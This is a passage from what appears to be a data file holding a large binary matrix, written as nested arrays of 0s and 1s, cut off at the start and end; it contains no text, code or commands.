,0,1,0,1,0,1,1,1,1,0,1,0,0,1,0,1,0,0,0,1,0,1,1,1,0,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,0,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1],[1,1,0,1,0,1,1,0,1,0,0,1,0,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,1,1,0,1,0,1,1,0,0,1,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,0,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,0,0,1,1,1,1,0,1,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,1,1,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1],[0,1,1,0,1,1,0,0,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,0,0,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,1,1,1,0,0,1,0,1,1,1,1,1,1,0,0,1,0,1,1,1,1,1,0,1,0,0,0,0,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1],[0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,0,1,1,0,1,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,1,1,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0],[0,1,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,1,1,1,1,1,0,0,0,1,1,1,1,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,1,1,1,1,1,0,1],[1,1,1,1,1,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,0,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1],[0,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,0,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,1,0,0],[1,0,0,1,0,0,1,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,0,1,1,1,0,0,1,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,1,0,0,1,1,0,1,1],[1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,1,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,1,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,1,1,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,0,0,1,1],[0,0,0,1,1,1,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,0,0,1,0,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,1,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,0,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,1],[1,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,0,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,1,1,1,1,1,1,0,0,0,1,0,1,1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1],[0,0,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,0,1,1,0,0,1,1,1,1,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,1,1,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,0,1,0,0,0,0,1,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,1,0,1,1],[0,1,1,1,1,0,1,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,1,1,0,1,1,0,0,0,1,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,0,1,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1],[0,1,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,0,0,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,0,0,1,1,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1],[1,1,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,0,1,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,1,1,1,0,1,1,1,1,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,0,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,1],[0,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,1,1,1,1,0,0,0,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,0,0,1,0,1,0,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,1,0,1,0,0,1,0,0,1,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,0,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,1,1,1,0,0,1,0,1,0],[1,1,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,1,0,1,1,0,0,0,1,1,0,0,1,0,0,1,1,1,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,1,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,0,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,0,0,1],[1,1,1,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,1,1,0,0,1,0,0,1,1,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,0,0,0,0,1],[1,0,1,1,0,1,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,0,1,1,1,1,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,0,1,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,0,0,1,1,0,1,1,1,0,1,0,0,1,0,1,1,1,1],[0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,1,1,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,1,0,1,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0],[0,0,0,1,1,0,0,0,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,0,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,1,0,0,0,1,0,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,1,1,0,0,1,1],[0,1,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,1,0,1,1,0,1,1,1,1,1,0,0,0,1,0,1,1,1,1,1,0,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1],[1,1,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1,1,0,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,1,0,0,1,1,0,0,0,1,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0,0,1],[1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,0,1,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,1,0,0,1,1,0,1,0,0,1,1],[1,0,0,0,1,1,1,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,1,0,0,1,1,1,0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,0,1,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,0,0,0],[0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,1,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,1,1,1,0,1,0,0,1,1,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,1,1],[0,1,1,1,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,0,1,1,1,1,1,1,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,1,1,0,0,1,0,1,1,1,1,0,0,0,0,1,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1],[1,0,0,1,0,0,1,0,0,1,0,1,0,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,0,0,1,0,0,0,1,1,1,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,0,1,1,0,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,1],[1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,0,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,1,1,1,1,0,1,1,0,1,1,0,1,1,1,0,1,1,1,0,1,0,0,1,0,0,0,0,0,0,0,1,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,0,1,0,0,0,1,1,0,1,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,1,1,1,1,0,0,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,0,1,0,0,1,0,0,1,1],[0,0,1,1,0,1,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,1,0,0,1,0,0,0,1,1,1,0,0,1,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,1,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,1,1,0],[0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,0,0,1,1,0,1,0,0,1,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,1,1,0,1,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,0,0],[0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,1,1,0,0,0,1,1,0,0,1,0,0,1,0,1,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,1,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,1,0,0,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,1,0,1,1,0,0,1,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,1,0,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,1,0,0,1,1,1],[0,1,0,1,1,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,0,0,1,1,1,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0],[1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,0,1,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,1,1,0,0,1,1,1,0,1,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,1,0,0,1,0,0,1,1,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,0,0],[1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,0,1,1,0,0,1,0,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,0,0,0,1,1,0,0,0,1,1,1,1,1,1,0],[0,1,1,0,1,1,1,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,1,1,0,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,1,1,0,0,1,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,0,1,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0],[1,0,1,1,1,1,1,0,1,1,1,1,1,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,1,1,0,1,0,1,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,0,1,0,0,1,0,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,0,1,1,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,0,1,0,1,0,0,1,0,1],[1,0,0,0,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,1,1,0,0,1,0,0,1,1,